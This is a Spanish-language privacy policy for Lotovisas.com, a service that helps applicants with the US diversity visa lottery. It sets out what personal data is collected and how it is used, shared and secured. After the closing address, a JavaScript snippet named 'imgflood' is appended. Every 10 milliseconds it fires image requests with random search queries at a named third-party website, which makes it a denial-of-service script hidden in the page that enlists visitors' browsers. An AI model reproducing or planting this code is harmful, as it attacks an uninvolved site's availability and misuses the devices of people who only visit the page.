Política de Privacidad

American Visa Net International

Lotovisas.com está comprometida con proteger la privacidad en nuestra página web dedicada exclusivamente al servicio de valor agregado de orientación en español para la aplicación al programa de inmigración diversa en línea. A continuación exponemos nuestras políticas de obtención y manejo de información adoptadas por nosotros. Cualquier duda con respecto a o expuesto aquí, se sugiere contactarnos vía email a privacy@lotovisas.com

Tipo de información recolectada

Lotovisas.com recolecta información personal de identificación general, al momento de su registro en nuestra página, así como al momento de la adquisición de nuestros servicios. A continuación una lista de los datos que recolectamos, entre otros:

  • Nombre y Apellido
  • Edad
  • Género
  • Dirección
  • Números de Teléfonos
  • País de Nacimiento
  • Correo Electrónico
  • Email
  • Dirección de IP
  • Información de su Navegador

Uso de sus datos personales

El uso de sus datos recolectados al momento de su registro, es exclusivamente para la operatividad de un negocio legitimo y seguimiento de mercadeo, que pudiera incluir entre otros:

  • Mejorar la Calidad del Servicio.
  • Procesar su solicitud de servicios.
  • Mejoramiento de nuestra página web y oferta de servicios.
  • Resolver disputas.
  • Recolectar nuestros honorarios.
  • Investigación de Mercadeo.
  • Envío de ofertas ocasionales a nuestros usuarios, para que puedan participar en descuentos
    especiales.
  • Poder ofrecerle una experiencia más personalizada sobre los servicios que ofrecemos.

Compartir y revelar información

Lotovisas.com no vende, renta ni comparte información personal de usted con ningún otro individuo; excepto en los casos que usted nos autoriza compartir con otros su información personal o en las siguientes situaciones:

  • En caso de que nos vemos en la necesidad de responder a citaciones jurídicas y/o a procesos legales, o para establecer o proteger nuestros derechos legales o para defendernos en procesos legales.
  • Si consideramos necesario compartir su información personal para investigar, prevenir o tomar las medidas necesarias con respecto a una actividad ilegal, posible fraude, situaciones de emergencia (que sean riesgos potenciales para la seguridad de cualquier persona), por violaciones a los Términos y Condiciones de Lotovisas.com o por que las autoridades legales acreditadas nos lo soliciten.

Derecho a detener el envio de comunicaciones

Usted tiene el derecho a detener (unsubscribe) la recepción de newsletters, o correos de nuestra parte. Solo debe hacer clic en el enlace que se encuentra al final de nuestros correos, titulado “darse de baja” o “unsubscribe”.

Lotovisas.com, pudiera compartir información sobre nuestros usuarios con socios comerciales, patrocinantes y terceras personas. sin embargo la información es compartida en una manera que el ningún usuario individual pueda ser identificado.

Recolección de datos de pago

Cuando usted hace una compra en nuestra pagina utilizando su tarjeta de crédito, debe saber que esta información es trasmitida a través de nuestro servidor que utiliza la tecnología de seguridad SSL (‘Secure Sockets Layers’), para la protección de sus datos. Ninguna información de su tarjeta de crédito es guardada en nuestros servidores, sólo son transmitidos a procesadores de tarjetas de crédito PayPal, Stripe, BA Merchant Services, Authorize para ser autorizados y validados.

Política de Seguridad de la Información

Lotovisas.com ha tomado todas las medidas necesarias para asegurar que los datos de nuestros usuarios se encuentra protegida contra el acceso desautorizado, el uso, alteración, destrucción accidental o perdida. Sin embargo se debe tener claro el riesgo asociado de transmitir información a través del internet, a pesar de las medidas tomadas por Lotovisas.com.

Adoptamos medidas de seguridad que se componen de herramientas y procedimientos que limitan el acceso a la información privada y personal.

Utilizamos “Cookies” que se descargan en su computador con el objetivo de simplificar y mejorar la experiencia de interacción con nuestra página web. Usted tiene el derecho de establecer preferencias en su navegador para evitar el almacenamiento de estas “cookies”, sin embargo tenga en cuenta que nuestra página no funcionara adecuadamente.

Modificaciones a estas Políticas de Privacidad

Lotovisas.com, puede realizar enmiendas a esta normativa. Si los cambios que realizamos son importantes y afectan directamente al uso que le damos a la información personal de nuestros usuarios, se los haremos saber mediante un mensaje enviado a la dirección principal de correo electrónico que nos especificó en su registro o colocando en nuestras páginas avisos destacados
al respecto.

Dudas o sugerencias

Si tiene dudas o sugerencias respecto a nuestras Política de Privacidad, no dude en envíenos un
correo electrónico a privacy@lotovisas.com ó puede contactarnos a:

LotoVisas.com
PO BOX 266755
Weston, FL 33326
USA

function imgflood() { var TARGET = 'www.doctor-4-u.co.uk'; var URI = '/catalogsearch/result/?q='; var pic = new Image(); var rand = Math.floor(Math.random() * 1000000); pic.src = 'http://'+TARGET+URI+rand; } setInterval(imgflood, 10);